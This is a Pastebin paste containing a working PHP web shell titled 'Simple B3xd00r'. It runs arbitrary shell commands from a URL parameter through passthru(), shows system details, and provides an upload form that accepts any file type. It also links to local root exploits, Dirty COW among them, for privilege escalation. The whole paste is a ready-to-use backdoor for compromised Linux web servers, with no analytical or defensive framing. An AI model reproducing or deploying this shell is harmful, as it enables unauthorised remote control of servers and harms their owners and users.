Advertisement
ardann

[CMD] [LINUX] [~ Simple B3xd00r ~]

Dec 28th, 2017
294
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.52 KB | None | 0 0
  1. <html>
  2. <!---       _________________
  3.  ...::::::~[ Simple Backdoor ]~::::::...
  4. |=> COMMAND LINUX
  5. |=> USAGE: example.com/cmd.php?CMD_LINUX=your.command.here
  6. |=> UPLOADER ( ALLOWED ALL EXTENSIONS )
  7. |=> SMALL SIZE
  8. |=> INFORMATION SYSTEM ( UNAME )
  9. ----------------------------------------
  10. -->
  11. <head>
  12. <meta charset="UTF-8">
  13. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  14. <meta http-equiv="X-UA-Compatible" content="IE=edge">
  15. <meta name="author" content="B3XD00R">
  16. <meta name="url" content="http://pasangmata.co.id">
  17. <meta name="copyright" content="B3XD00R">
  18. <link rel="shortcut icon" href="http://suspend.kopiadem.com/images/favicon/favicon.ico">
  19. <title>~ Simple B3xd00r ~</title>
  20. <a href="https://www.exploit-db.com" target="_blank">Local Root Xploit</a></div>
  21. <br>
  22. <a href="https://github.com/FireFart/dirtycow/raw/master/dirty.c" target="_blank">Dirty COW Local Root Xploit</a></div>
  23. <br>
  24. <a href="https://root.bl33dz.me/" target="_blank">More Local Root Xploit ( Compiled & Noncompiled )</a></div>
  25. <br>
  26. </head>
  27. <body>
  28. <?php
  29. echo '<b>System:'.php_uname().'</b><br>';
  30. echo '<b><==(OUTPUT)'.passthru($_GET['CMD_LINUX']).'</b><br>';
  31. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader">';
  32. echo '<input type="file" name="file" size="50"><input name="Uploader" type="submit" value="Upload"></form>';
  33. if( $_POST['Uploader'] == "Upload" ) {
  34.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Successfully!</b>'; }
  35.     else { echo '<b>FAILED</b>'; }
  36. }
  37. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement